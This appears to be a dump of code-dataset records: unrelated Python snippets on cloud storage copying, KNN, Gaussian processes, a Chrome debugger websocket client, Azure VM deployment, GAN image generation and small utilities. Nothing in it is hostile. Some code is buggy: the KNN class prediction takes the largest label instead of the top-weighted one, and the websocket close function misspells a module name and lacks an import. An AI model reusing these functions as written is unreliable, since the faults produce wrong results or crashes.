result = self.storage_provider.get(source=source_obj,
destination=target_obj,
recursive=recursive)
elif target == "awss3":
source_obj = str(Path(source_obj).expanduser()).replace("\\", "/")
if source == "azure":
source_provider = StorageAzureblobProvider(service="azure")
config = Config(config_path="~/.cloudmesh/cloudmesh.yaml")
spec = config["cloudmesh.storage"]
local_target = spec["local"]["default"]["directory"]
local_target = local_target.replace("\\", "/")
result = source_provider.get(source=source_obj,
destination=local_target,
recursive=recursive)
print("Fetched from azure blob to local:\n")
pprint(result)
# TODO: return error here itself if the source object is not
# found
if result is None:
return Console.error(f"Object {source_obj} couldn't be "
f"fetched from {source}. Please "
f"check'")
else:
print(len(result[0]['name']))
# Removing root from the source_obj
temp_p = Path(source_obj)
source_obj = str(temp_p).replace(temp_p.root, "", 1)
source_obj = str(Path(Path(local_target).expanduser() /
source_obj))
print(source_obj)
result = self.storage_provider.put(source=source_obj,
destination=target_obj,
recursive=recursive)
else:
raise NotImplementedError
if len(result) == 0:
return Console.error(f"Object {source_obj} couldn't be copied from "
f"{source} to {target}. Please check.")
else:
Console.ok(f"Copied {source_obj} from {source} to {target}\nTarget "
f"object name is {target_obj} ")
# pprint(result)
return self.print_table(result, status='Copied', source=source,
target=target)
#
# if __name__ == "__main__":
# p = Provider(source=None, source_obj=None,
# target="awss3", target_obj="\\")
#
# # p.list(source=None, source_obj=None,
# # target="awss3", target_obj="/folder1")
#
# # p.delete(source=None, source_obj=None,
# # target="awss3", target_obj="/folder1")
#
# # p.copy(source="awss3", source_obj="/folder1",
# # target="local", target_obj="~\\cmStorage",
# # recursive=True)
#
# p.copy(source="local", source_obj="~\\cmStorage\\folder1",
# target="awss3", target_obj="/folder1/",
# recursive=True)
# # TODO : Following command did not create folder1 in AWS S3. Check.
# # p.copy(source="azure", source_obj="\\folder1\\",
# # target="awss3", target_obj="\\",
# # recursive=True)
| StarcoderdataPython |
3268044 | #!/usr/bin/env python3
# K N N A L G O R I T H M
# Project KNN Algorithm Implementation
# Author <NAME>
# Email <EMAIL>
# Date 13.01.2017
# Python 3.5.1
# License MIT
import math
from random import random
from collections import defaultdict
def get_train_test_sets(data, results, train=0.75):
"""Split data and results into train and test sets"""
x_train, x_test, y_train, y_test = [], [], [], []
for idx, sample in enumerate(data):
if random() < train:
x_train.append(sample)
y_train.append(results[idx])
else:
x_test.append(sample)
y_test.append(results[idx])
return x_train, x_test, y_train, y_test
def gauss(dist, sigma=10.0):
"""Gauss weight function"""
return math.e ** (-dist ** 2 / (2 * sigma ** 2))
def inverse(dist):
"""Inverse weight function"""
return 1 / (dist + 1)
def get_distance(vec1: list, vec2: list) -> float:
"""Return Euclidean distance of 2 vectors"""
return math.sqrt(sum([pow(i - j, 2) for i, j in zip(vec1, vec2)]))
def knn(vec, vectors, k):
"""Return k-nearest neighbors of vec compared to each vector in vectors"""
distances = [(idx, get_distance(vec, vecx))
for idx, vecx in enumerate(vectors)]
return sorted(distances, key=lambda x: x[1])[:k]
def regr_predict(vec, vectors, results, k, weighted=True, weight_func=inverse):
"""Regression prediction"""
neighbors = knn(vec, vectors, k)
weights, total = 0, 0
for idx, distance in neighbors:
if weighted:
weight = weight_func(distance)
total += results[idx] * weight
weights += weight
else:
total += results[idx]
weights += 1
# return avg
return total / weights
def cls_predict(vec, vectors, results, k, weighted=True, weight_func=inverse):
"""Class prediction"""
neighbors = knn(vec, vectors, k)
predictions = defaultdict(int)
for idx, distance in neighbors:
if weighted:
weight = weight_func(distance)
predictions[results[idx]] += weight
else:
predictions[results[idx]] += 1
return max(predictions)
def regr_error_rate(x_train, y_train, x_test, y_test, k):
"""Return regression prediction error rate on given data sets
with specified k"""
error = 0.0
for x_test_i, y_test_i in zip(x_test, y_test):
pred = regr_predict(x_test_i, x_train, y_train, k)
error += abs(pred - y_test_i) / y_test_i
error_rate = error / len(y_test)
return error_rate
def cls_error_rate(x_train, y_train, x_test, y_test, k):
"""Return classification prediction error rate on given data sets
with specified k"""
error = 0.0
for x_test_i, y_test_i in zip(x_test, y_test):
pred = cls_predict(x_test_i, x_train, y_train, k)
# Compare predicted and real results
if pred != y_test_i:
error += 1
error_rate = error / len(y_test)
return error_rate
def get_best_fit_model(x_train, y_train, x_test, y_test):
"""Return the best fit number of k (lower is prefered)
for prediction on given data sets"""
k_max = int(len(y_train) / 3)
best_model = (None, 1.0)
# Classification or regression?
if isinstance(y_train[0], str) or isinstance(y_train[0], bool):
func = cls_error_rate
else:
func = regr_error_rate
# Test all value for k
for k in range(1, k_max):
error_rate = func(x_train, y_train, x_test, y_test, k)
if error_rate < best_model[1]:
best_model = (k, error_rate)
# Return lowest best fit number of k
return best_model[0]
| StarcoderdataPython |
3296293 | from Backtest import Backtest
from Portfolio import Portfolio | StarcoderdataPython |
10286 | <reponame>phumm/gpytorch
#!/usr/bin/env python3
from .gp import GP
from .pyro import _PyroMixin # This will only contain functions if Pyro is installed
class ApproximateGP(GP, _PyroMixin):
def __init__(self, variational_strategy):
super().__init__()
self.variational_strategy = variational_strategy
def forward(self, x):
"""
As in the exact GP setting, the user-defined forward method should return the GP prior mean and covariance
evaluated at input locations x.
"""
raise NotImplementedError
def pyro_guide(self, input, beta=1.0, name_prefix=""):
"""
(For Pyro integration only). The component of a `pyro.guide` that
corresponds to drawing samples from the latent GP function.
Args:
:attr:`input` (:obj:`torch.Tensor`)
The inputs :math:`\mathbf X`.
:attr:`beta` (float, default=1.)
How much to scale the :math:`\text{KL} [ q(\mathbf f) \Vert p(\mathbf f) ]`
term by.
:attr:`name_prefix` (str, default="")
A name prefix to prepend to pyro sample sites.
"""
return super().pyro_guide(input, beta=beta, name_prefix=name_prefix)
def pyro_model(self, input, beta=1.0, name_prefix=""):
r"""
(For Pyro integration only). The component of a `pyro.model` that
corresponds to drawing samples from the latent GP function.
Args:
:attr:`input` (:obj:`torch.Tensor`)
The inputs :math:`\mathbf X`.
:attr:`beta` (float, default=1.)
How much to scale the :math:`\text{KL} [ q(\mathbf f) \Vert p(\mathbf f) ]`
term by.
:attr:`name_prefix` (str, default="")
A name prefix to prepend to pyro sample sites.
Returns: :obj:`torch.Tensor` samples from :math:`q(\mathbf f)`
"""
return super().pyro_model(input, beta=beta, name_prefix=name_prefix)
def __call__(self, inputs, prior=False, **kwargs):
if inputs.dim() == 1:
inputs = inputs.unsqueeze(-1)
return self.variational_strategy(inputs, prior=prior)
| StarcoderdataPython |
142555 | <filename>cmdebug/protocol.py
import socket
import json
import pdb
import simple_http
import urlparse
from chrome_debugger import websocket
def connect(wsurl):
context = websocket.gen_handshake(wsurl)
host = "localhost"
port = 9222
netloc = context["components"].netloc
if ":" in netloc:
host, port = netloc.split(":")
port = int(port)
sock = socket.create_connection((host, port))
sock.send(context["header"])
context["response"] = websocket.parse_response(sock.recv(4096))
if context["response"]["Sec-WebSocket-Accept"] != websocket.gen_response_key(context["key"]):
sock.close()
raise ValueError("Incorrected Key")
context["sock"] = sock
context["id"] = 0
return context
def send_text(context, data):
gen = websocket.gen_frame(True, websocket.TEXT, data)
context["sock"].send(gen)
def send_binary(context, data):
gen = websocket.gen_frame(True, websocket.BINARY, data)
context["sock"].send(gen)
def close(context, status, message):
gen = websockeet.gen_frame(True, websocket.CLOSE,
struct.pack("!H", status) + message)
context["sock"].send(gen)
def recv(context):
parser = websocket.parse_context.copy()
while True:
websocket.parse_frame(parser, context["sock"].recv(4096))
if not parser["expect"]:
return parser["frames"]
| StarcoderdataPython |
1680486 | import torch
import torchvision.utils as utils
import io
from PIL import Image
from enum import Enum, auto
from train import loadModel
from generator import DCGenerator, getImage
class GType(Enum):
CELEBA_30_E = "celeba-30-e"
CELEBA_20_E = "celeba-20-e"
CELEBA_10_E = "celeba-10-e"
@classmethod
def has_value(cls, value):
return value in cls._value2member_map_
class GeneratorManager():
def __init__(self):
self.generators = {
GType.CELEBA_30_E.value: loadModel("models/dcgan_celeba/dcgan_celeba_30_g", DCGenerator),
GType.CELEBA_20_E.value: loadModel("models/dcgan_celeba/dcgan_celeba_20_g", DCGenerator),
GType.CELEBA_10_E.value: loadModel("models/dcgan_celeba/dcgan_celeba_10_g", DCGenerator)
}
def generateImage(self, g_type: GType, image_number, label = None):
rand_tensor = rand_tensor = torch.randn(64, 100, 1, 1)
# if label is not None:
# out_tensor = self.generators[g_type](rand_tensor, label).squeeze()
# else:
out_tensor = self.generators[g_type](rand_tensor).squeeze()
return self.__tensorToPNG(image_number, out_tensor)
def __tensorToPNG(self, image_number, out_tensor):
grid = utils.make_grid(out_tensor[:image_number], padding=2, normalize=True)
image = Image.fromarray(getImage(grid))
buffer = io.BytesIO()
image.save(buffer, 'PNG')
buffer.seek(0)
return buffer | StarcoderdataPython |
3215671 | import sys
import os
sys.path.append(os.path.dirname(__file__) + "/../../")
from hackathon.azureautodeploy.azureUtil import *
from hackathon.database import *
from azure.servicemanagement import *
import datetime
class AzureVirtualMachines:
"""
Azure virtual machines are a collection of deployment and virtual machine on the deployment
Currently the status of deployment in database is only RUNNING,
the status of virtual machine are RUNNING and STOPPED
"""
def __init__(self, sms, user_template, template_config):
self.sms = sms
self.user_template = user_template
self.template_config = template_config
def create_virtual_machines(self):
"""
1. If deployment not exist, then create virtual machine with deployment
Else check whether it created by this function before
2. If deployment created by this function before and virtual machine not exist,
then add virtual machine to deployment
Else check whether virtual machine created by this function before
:return:
"""
user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINES, START)
storage_account = self.template_config['storage_account']
container = self.template_config['container']
cloud_service = self.template_config['cloud_service']
deployment = self.template_config['deployment']
virtual_machines = self.template_config['virtual_machines']
cs = db_adapter.find_first_object_by(UserResource, type=CLOUD_SERVICE, name=cloud_service['service_name'])
if cs is None:
m = '%s %s not running in database now' % (CLOUD_SERVICE, cloud_service['service_name'])
user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINES, FAIL, m)
log.error(m)
return False
for virtual_machine in virtual_machines:
user_operation_commit(self.user_template, CREATE_DEPLOYMENT, START)
user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, START)
config = None
os_hd = None
vm_image = None
image = virtual_machine['image']
system_config = virtual_machine['system_config']
if image['type'] == 'os':
# check whether virtual machine is Windows or Linux
if system_config['os_family'] == WINDOWS:
config = WindowsConfigurationSet(computer_name=system_config['host_name'],
admin_password=system_config['user_password'],
admin_username=system_config['user_name'])
config.domain_join = None
config.win_rm = None
else:
config = LinuxConfigurationSet(system_config['host_name'],
system_config['user_name'],
system_config['user_password'],
False)
now = datetime.datetime.now()
blob = '%s-%s-%s-%s-%s-%s-%s.vhd' % (image['name'],
str(now.year), str(now.month), str(now.day),
str(now.hour), str(now.minute), str(now.second))
media_link = 'https://%s.%s/%s/%s' % (storage_account['service_name'],
storage_account['url_base'],
container,
blob)
os_hd = OSVirtualHardDisk(image['name'], media_link)
else:
vm_image = image['name']
network_config = virtual_machine['network_config']
# remote
remote = virtual_machine['remote']
remote_provider = remote['provider']
remote_protocol = remote['protocol']
remote_input_endpoint_name = remote['input_endpoint_name']
gc = {
'displayname': remote_input_endpoint_name,
'protocol': remote_protocol,
"username": system_config['user_name'] if image['type'] == 'os' else 'opentech',
"password": system_config['user_password'] if image['type'] == 'os' else '<PASSWORD>!'
}
# avoid duplicate deployment
if self.deployment_exists(cloud_service['service_name'], deployment['deployment_slot']):
if db_adapter.count_by(UserResource,
type=DEPLOYMENT,
name=deployment['deployment_name'],
cloud_service_id=cs.id) == 0:
m = '%s %s exist but not created by this function before' % \
(DEPLOYMENT, deployment['deployment_name'])
user_resource_commit(self.user_template, DEPLOYMENT, deployment['deployment_name'], RUNNING, cs.id)
else:
m = '%s %s exist and created by this function before' % \
(DEPLOYMENT, deployment['deployment_name'])
user_operation_commit(self.user_template, CREATE_DEPLOYMENT, END, m)
log.debug(m)
# avoid duplicate role
if self.role_exists(cloud_service['service_name'],
deployment['deployment_name'],
virtual_machine['role_name']):
if db_adapter.count_by(UserResource,
user_template_id=self.user_template.id,
type=VIRTUAL_MACHINE,
name=virtual_machine['role_name'],
cloud_service_id=cs.id) == 0:
m = '%s %s exist but not created by this user template before' % \
(VIRTUAL_MACHINE, virtual_machine['role_name'])
user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, FAIL, m)
log.error(m)
return False
else:
m = '%s %s exist and created by this user template before' % \
(VIRTUAL_MACHINE, virtual_machine['role_name'])
user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, END, m)
log.debug(m)
else:
# delete old virtual machine info in database, cascade delete old vm endpoint and old vm config
db_adapter.delete_all_objects_by(UserResource,
type=VIRTUAL_MACHINE,
name=virtual_machine['role_name'],
cloud_service_id=cs.id)
db_adapter.commit()
try:
result = self.sms.add_role(cloud_service['service_name'],
deployment['deployment_name'],
virtual_machine['role_name'],
config,
os_hd,
role_size=virtual_machine['role_size'],
vm_image_name=vm_image)
except Exception as e:
user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, FAIL, e.message)
log.error(e)
return False
# make sure async operation succeeds
if not wait_for_async(self.sms, result.request_id, ASYNC_TICK, ASYNC_LOOP):
m = WAIT_FOR_ASYNC + ' ' + FAIL
user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, FAIL, m)
log.error(m)
return False
# make sure role is ready
if not self.wait_for_role(cloud_service['service_name'],
deployment['deployment_name'],
virtual_machine['role_name'],
VIRTUAL_MACHINE_TICK,
VIRTUAL_MACHINE_LOOP):
m = '%s %s created but not ready' % (VIRTUAL_MACHINE, virtual_machine['role_name'])
user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, FAIL, m)
log.error(m)
return False
else:
user_resource_commit(self.user_template,
VIRTUAL_MACHINE,
virtual_machine['role_name'],
RUNNING,
cs.id)
self.__vm_info_helper(cs,
cloud_service['service_name'],
deployment['deployment_name'],
virtual_machine['role_name'],
remote_provider,
gc,
network_config)
user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, END)
else:
# delete old deployment
db_adapter.delete_all_objects_by(UserResource,
type=DEPLOYMENT,
name=deployment['deployment_name'],
cloud_service_id=cs.id)
# delete old virtual machine info in database, cascade delete old vm endpoint and old vm config
db_adapter.delete_all_objects_by(UserResource,
type=VIRTUAL_MACHINE,
name=virtual_machine['role_name'],
cloud_service_id=cs.id)
db_adapter.commit()
try:
result = self.sms.create_virtual_machine_deployment(cloud_service['service_name'],
deployment['deployment_name'],
deployment['deployment_slot'],
virtual_machine['label'],
virtual_machine['role_name'],
config,
os_hd,
role_size=virtual_machine['role_size'],
vm_image_name=vm_image)
except Exception as e:
user_operation_commit(self.user_template, CREATE_DEPLOYMENT, FAIL, e.message)
user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, FAIL, e.message)
log.error(e)
return False
# make sure async operation succeeds
if not wait_for_async(self.sms, result.request_id, ASYNC_TICK, ASYNC_LOOP):
m = WAIT_FOR_ASYNC + ' ' + FAIL
user_operation_commit(self.user_template, CREATE_DEPLOYMENT, FAIL, m)
user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, FAIL, m)
log.error(m)
return False
# make sure deployment is ready
if not self.__wait_for_deployment(cloud_service['service_name'],
deployment['deployment_name'],
DEPLOYMENT_TICK,
DEPLOYMENT_LOOP):
m = '%s %s created but not ready' % (DEPLOYMENT, deployment['deployment_name'])
user_operation_commit(self.user_template, CREATE_DEPLOYMENT, FAIL, m)
log.error(m)
return False
else:
user_resource_commit(self.user_template, DEPLOYMENT, deployment['deployment_name'], RUNNING, cs.id)
user_operation_commit(self.user_template, CREATE_DEPLOYMENT, END)
# make sure role is ready
if not self.wait_for_role(cloud_service['service_name'],
deployment['deployment_name'],
virtual_machine['role_name'],
VIRTUAL_MACHINE_TICK,
VIRTUAL_MACHINE_LOOP):
m = '%s %s created but not ready' % (VIRTUAL_MACHINE, virtual_machine['role_name'])
user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, FAIL, m)
log.error(m)
return False
else:
user_resource_commit(self.user_template,
VIRTUAL_MACHINE,
virtual_machine['role_name'],
RUNNING,
cs.id)
self.__vm_info_helper(cs,
cloud_service['service_name'],
deployment['deployment_name'],
virtual_machine['role_name'],
remote_provider,
gc,
network_config)
user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINE, END)
user_operation_commit(self.user_template, CREATE_VIRTUAL_MACHINES, END)
return True
def deployment_exists(self, service_name, deployment_slot):
"""
Check whether specific deployment slot exist
If deployment slot exist, reset deployment name
:param service_name:
:param deployment_slot:
:return:
"""
try:
props = self.sms.get_deployment_by_slot(service_name, deployment_slot)
except Exception as e:
if e.message != 'Not found (Not Found)':
log.error('%s %s: %s' % (DEPLOYMENT, deployment_slot, e))
return False
self.template_config[T_DEPLOYMENT]['deployment_name'] = props.name
return props is not None
def role_exists(self, service_name, deployment_name, role_name):
"""
Check whether specific virtual machine exist
:param service_name:
:param deployment_name:
:param role_name:
:return:
"""
try:
props = self.sms.get_role(service_name, deployment_name, role_name)
except Exception as e:
if e.message != 'Not found (Not Found)':
log.error('%s %s: %s' % (VIRTUAL_MACHINE, role_name, e))
return False
return props is not None
def wait_for_role(self, service_name, deployment_name, role_instance_name,
second_per_loop, loop, status=READY_ROLE):
"""
Wait virtual machine until ready, up to second_per_loop * loop
:param service_name:
:param deployment_name:
:param role_instance_name:
:param second_per_loop:
:param loop:
:param status:
:return:
"""
count = 0
props = self.sms.get_deployment_by_name(service_name, deployment_name)
while self.__get_role_instance_status(props, role_instance_name) != status:
log.debug('_wait_for_role [%s] loop count: %d' % (role_instance_name, count))
count += 1
if count > loop:
log.error('Timed out waiting for role instance status.')
return False
time.sleep(second_per_loop)
props = self.sms.get_deployment_by_name(service_name, deployment_name)
return self.__get_role_instance_status(props, role_instance_name) == status
# --------------------------------------------helper function-------------------------------------------- #
def __wait_for_deployment(self, service_name, deployment_name, second_per_loop, loop, status=RUNNING):
"""
Wait for deployment until running, up to second_per_loop * loop
:param service_name:
:param deployment_name:
:param second_per_loop:
:param loop:
:param status:
:return:
"""
count = 0
props = self.sms.get_deployment_by_name(service_name, deployment_name)
while props.status != status:
log.debug('_wait_for_deployment [%s] loop count: %d' % (deployment_name, count))
count += 1
if count > loop:
log.error('Timed out waiting for deployment status.')
return False
time.sleep(second_per_loop)
props = self.sms.get_deployment_by_name(service_name, deployment_name)
return props.status == status
def __get_role_instance_status(self, deployment, role_instance_name):
"""
Get virtual machine status
:param deployment:
:param role_instance_name:
:return:
"""
for role_instance in deployment.role_instance_list:
if role_instance.instance_name == role_instance_name:
return role_instance.instance_status
return None
def __vm_info_helper(self, cs, cs_name, dm_name, vm_name, remote_provider, gc, network_config):
"""
Help to complete vm info
:param cs:
:param cs_name:
:param dm_name:
:param vm_name:
:return:
"""
# associate vm endpoint with specific vm
vm = db_adapter.find_first_object_by(UserResource,
user_template=self.user_template,
type=VIRTUAL_MACHINE,
name=vm_name,
cloud_service_id=cs.id)
gc['name'] = vm.name
network = ConfigurationSet()
network.configuration_set_type = network_config['configuration_set_type']
input_endpoints = network_config['input_endpoints']
assigned_ports = self.__get_assigned_ports(cs_name)
for input_endpoint in input_endpoints:
port = int(input_endpoint['local_port'])
# avoid duplicate vm endpoint under same cloud service
while str(port) in assigned_ports:
port = (port + 1) % 65536
assigned_ports.append(str(port))
vm_endpoint_commit(input_endpoint['name'],
input_endpoint['protocol'],
port,
input_endpoint['local_port'],
cs,
vm)
network.input_endpoints.input_endpoints.append(
ConfigurationSetInputEndpoint(input_endpoint['name'],
input_endpoint['protocol'],
str(port),
input_endpoint['local_port']))
if gc['displayname'] == input_endpoint['name']:
gc['port'] = port
result = self.sms.update_role(cs_name,
dm_name,
vm_name,
network_config=network)
wait_for_async(self.sms, result.request_id, ASYNC_TICK, ASYNC_LOOP)
self.wait_for_role(cs_name, dm_name, vm_name, VIRTUAL_MACHINE_TICK, VIRTUAL_MACHINE_LOOP)
# commit vm config
deploy = self.sms.get_deployment_by_name(cs_name, dm_name)
for role in deploy.role_instance_list:
# to get private ip
if role.role_name == vm_name:
public_ip = None
# to get public ip
if role.instance_endpoints is not None:
public_ip = role.instance_endpoints.instance_endpoints[0].vip
gc['hostname'] = public_ip
vm_config_commit(vm,
deploy.url,
public_ip,
role.ip_address,
remote_provider,
json.dumps(gc),
self.user_template)
break
def __get_assigned_ports(self, cloud_service_name):
properties = self.sms.get_hosted_service_properties(cloud_service_name, True)
ports = []
for deployment in properties.deployments.deployments:
for role in deployment.role_list.roles:
for configuration_set in role.configuration_sets.configuration_sets:
if configuration_set.configuration_set_type == 'NetworkConfiguration':
if configuration_set.input_endpoints is not None:
for input_endpoint in configuration_set.input_endpoints.input_endpoints:
ports.append(input_endpoint.port)
return ports | StarcoderdataPython |
38296 | <filename>dlutils/timer.py<gh_stars>1-10
# Copyright 2017-2019 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Profiling utils"""
import time
def timer(f):
""" Decorator for timeing function (method) execution time.
After return from function will print string: ``func: <function name> took: <time in seconds> sec``.
Args:
f (Callable[Any]): function to decorate.
Returns:
Callable[Any]: Decorated function.
Example:
::
>>> from dlutils import timer
>>> @timer.timer
... def foo(x):
... for i in range(x):
... pass
...
>>> foo(100000)
func:'foo' took: 0.0019 sec
"""
def __wrapper(*args, **kw):
time_start = time.time()
result = f(*args, **kw)
time_end = time.time()
print('func:%r took: %2.4f sec' % (f.__name__, time_end - time_start))
return result
return __wrapper
| StarcoderdataPython |
3338135 | <gh_stars>1-10
import heapq
class Solution:
def power(self,n):
if n in self.dic:
return self.dic[n]
if n % 2:
self.dic[n] = self.power(3 * n + 1) + 1
else:
self.dic[n] = self.power(n // 2) + 1
return self.dic[n]
def getKth(self, lo: int, hi: int, k: int) -> int:
self.dic = {1:0}
for i in range(lo,hi+1):
self.power(i)
lst = [(self.dic[i],i) for i in range(lo,hi+1)]
heapq.heapify(lst)
for i in range(k):
ans = heapq.heappop(lst)
return ans[1]
| StarcoderdataPython |
1722365 | <filename>scripts/data/mass_each_halo.py
import numpy as np
import sys; sys.path.append("/home/lls/mlhalos_code/")
import pynbody
import time
from multiprocessing import Pool
if __name__ == "__main__":
sims = ["11", "12", "13", "14", "15", "16", "17", "18", "19", "20", "21"]
for i in range(len(sims)):
sim = sims[i]
path_sim = "/share/hypatia/lls/simulations/standard_reseed" + sim + "/"
saving_path = "/share/hypatia/lls/deep_halos/reseed_" + sim + "/"
f = pynbody.load(path_sim + "output/snapshot_007")
f.physical_units()
# Halo mass
def get_halo_mass(halo_id):
halo = h[halo_id]
return float(halo['mass'].sum())
def get_mass_with_pool(num_halos):
ids = list(np.arange(num_halos))
pool = Pool(40)
masses = pool.map(get_halo_mass, ids)
pool.close()
return masses
print("Loading the halos...")
h = f.halos()
assert h._ordered == False
t0 = time.time()
masses = get_mass_with_pool(len(h))
t1 = time.time()
print("Loading halo masses took " + str((t1 - t0)/60) + " minutes.")
np.save(saving_path + "mass_Msol_each_halo_sim_" + sim + ".npy", masses)
| StarcoderdataPython |
3290206 | """
Module that contains the Menu model class.
"""
# Core imports
from pprint import pformat
class Menu(object):
"""Class that models a Food Menu."""
# Allowed attributes for this class
attributes = ('meal', 'meal_combination', 'rice', 'maindish', 'garnish', 'salad', 'dessert',
'juice', 'notes')
# Allowed values for the attribute Menu.meal
MEAL_LUNCH = 'lunch'
MEAL_LUNCH_VEGGIE = 'lunch-vegetarian'
MEAL_DINNER = 'dinner'
MEAL_DINNER_VEGGIE = 'dinner-vegetarian'
available_meals = (MEAL_LUNCH, MEAL_LUNCH_VEGGIE, MEAL_DINNER, MEAL_DINNER_VEGGIE, None)
# Portuguese translations for the allowed values for the Menu.meal attribute
meal_translations = {
MEAL_LUNCH: 'Almoço',
MEAL_LUNCH_VEGGIE: 'Almoço Vegetariano',
MEAL_DINNER: 'Jantar',
MEAL_DINNER_VEGGIE: 'Jantar Vegetariano',
}
def __init__(self, meal=None, rice=None, maindish=None, garnish=None, salad=None,
dessert=None, juice=None, notes=None):
"""Instantiates a new Menu."""
self.meal = meal
self.meal_combination = None
self.rice = rice
self.maindish = maindish
self.garnish = garnish
self.salad = salad
self.dessert = dessert
self.juice = juice
self.notes = notes
def __str__(self):
"""Returns the object's attributes in a dict-like format."""
return pformat((vars(self)))
def __setattr__(self, key, value):
"""Allow setting only valid attributes for this class."""
if key not in Menu.attributes:
raise AttributeError("'{}' is not a valid attribute".format(key))
if key in ('meal', 'meal_combination') and value not in Menu.available_meals:
raise AttributeError("'{}' is not a valid meal identifier - options are {}.".format(
value, Menu.available_meals))
super(Menu, self).__setattr__(key, value)
def __getattr__(self, key):
"""Allow getting only valid attributes for this class."""
if key not in Menu.attributes:
raise AttributeError("'{}' is not a valid attribute".format(key))
super(Menu, self).__getattribute__(key)
def format(self):
"""Formats the contents of the Menu in a pretty, easy-to-read way."""
values = vars(self)
values['garnish'] = self.garnish if self.garnish else 'Nenhuma'
if self.meal_combination:
values['meal'] = '{} + {}'.format(
Menu.meal_translations.get(self.meal, 'Desconhecido'),
Menu.meal_translations.get(self.meal_combination, 'Desconhecido'),
)
else:
values['meal'] = Menu.meal_translations.get(self.meal, 'Desconhecido')
values['border'] = '=' * len('Refeição: {}'.format(self.meal))
return "\n".join(["{border}",
"Refeição: {meal}",
"{border}",
" * Arroz: {rice}",
" * Prato principal: {maindish}",
" * Guarnição: {garnish}",
" * Salada: {salad}",
" * Sobremesa: {dessert}",
" * Suco: {juice}",
" * Observações: {notes}"]).format(**values) + "\n"
@staticmethod
def _combine_attribute(attribute, other_attribute, separator=', '):
"""
Combines two attributes in a Meal.
The values are only combined if the attributes are different, don't contain each other
and other_attribute is not None.
If the values are not combined, the first attribute is returned.
:param str attribute: one attribute to be combined.
:param str other_attribute: another attribute to be combined.
:param str separator: a string to separate the attributes in the resulting string.
:return str: The attributes combined in a string, separated by a separator, or the original
attribute.
"""
if (other_attribute and attribute != other_attribute and
attribute not in other_attribute and other_attribute not in attribute):
return '{}{}{}'.format(attribute, separator, other_attribute)
return attribute
def combine(self, menu):
"""
Combines the attributes of two Menus. The result is a new Menu, originals are not modified.
:param bandeco.menu.Menu menu: the menu to be combined with the instance.
:return bandeco.menu.Menu: A new Menu with combined attributes.
"""
if type(self) != type(menu):
raise TypeError("Só é possível combinar um cardápio com outro cardápio")
combined = Menu()
combined.meal = self.meal
combined.meal_combination = menu.meal
combined.rice = Menu._combine_attribute(self.rice, menu.rice)
combined.maindish = Menu._combine_attribute(self.maindish, menu.maindish)
combined.garnish = Menu._combine_attribute(self.garnish, menu.garnish)
combined.salad = Menu._combine_attribute(self.salad, menu.salad)
combined.dessert = Menu._combine_attribute(self.dessert, menu.dessert)
combined.juice = Menu._combine_attribute(self.juice, menu.juice)
combined.notes = Menu._combine_attribute(self.notes, menu.notes, ' ')
return combined
| StarcoderdataPython |
27837 | <reponame>nbilbo/services_manager<gh_stars>0
"""Frame to show all service\'s register\'s.
"""
import tkinter.ttk
from src.view import constants
from src.view.services_page import ServicesPage
class ServicesReadPage(ServicesPage):
def __init__(self, parent, controller, *args, **kwargs):
super(ServicesReadPage, self).__init__(parent, *args, **kwargs)
self.handler = Handler(self, controller)
self.create_treeview()
self.create_crud_buttons()
self.create_binds()
self.set_title("Services")
def create_treeview(self):
"""Create treeview to show data.
"""
self.treeview = tkinter.ttk.Treeview(self)
self.treeview.pack(side="top", fill="both", expand=True, padx=constants.PADX, pady=constants.PADY)
def create_crud_buttons(self):
"""Create crud buttons.
"""
container = tkinter.ttk.Frame(self)
container.pack(side="top", fill="both")
self.add_button = tkinter.ttk.Button(
container,
text="Add")
self.update_button = tkinter.ttk.Button(
container,
text="update")
self.delete_button = tkinter.ttk.Button(
container,
text="delete")
for button in (
self.add_button,
self.update_button,
self.delete_button):
button.pack(
side="left",
fill="both",
expand=True,
padx=constants.PADX,
pady=constants.PADY)
def create_binds(self):
"""Connect events and handler.
"""
self.back_button["command"] = self.handler.inicialize_home_page
self.add_button["command"] = self.handler.inicialize_services_add_page
self.delete_button["command"] = self.handler.inicialize_services_delete_page
self.update_button["command"] = self.handler.inicialize_services_update_page
def get_add_button(self):
"""
return
tkinter.ttk.Button
"""
return self.add_button
def get_update_button(self):
"""
return
tkinter.ttk.Button
"""
return self.update_button
def get_delete_button(self):
"""
return
tkinter.ttk.Button
"""
return self.delete_button
def get_treeview(self):
"""
return
tkinter.ttk.Treeview
"""
return self.treeview
class Handler(object):
def __init__(self, widget, controller):
super(Handler).__init__()
self.widget = widget
self.controller = controller
def inicialize_home_page(self):
self.controller.inicialize_home_page()
def inicialize_services_add_page(self):
self.controller.inicialize_services_add_page()
def inicialize_services_delete_page(self):
self.controller.inicialize_services_delete_page()
def inicialize_services_update_page(self):
self.controller.inicialize_services_update_page()
| StarcoderdataPython |
1776592 | <reponame>BHFDSC/CCU013_01_ENG-COVID-19_event_phenotyping
# Databricks notebook source
# MAGIC %md
# MAGIC # Create skinny table of patients & CALIBER phenotypes
# MAGIC
# MAGIC **Description**
# MAGIC
# MAGIC 1. For each terminology in `ccu013_caliber_codelist_master`
# MAGIC 2. Join data source with codelist on `code` to get `phenotype`:
# MAGIC * 1. `terminology = ICD` -> HES APC DIAG
# MAGIC * 2. `terminology = OPCS` -> HES APC OP
# MAGIC * 3. `terminology = SNOMED` -> GDPPR
# MAGIC 3. Unite & agreggate to produce a 'skinny table' of patients, `phenotype` and `date`
# MAGIC
# MAGIC
# MAGIC
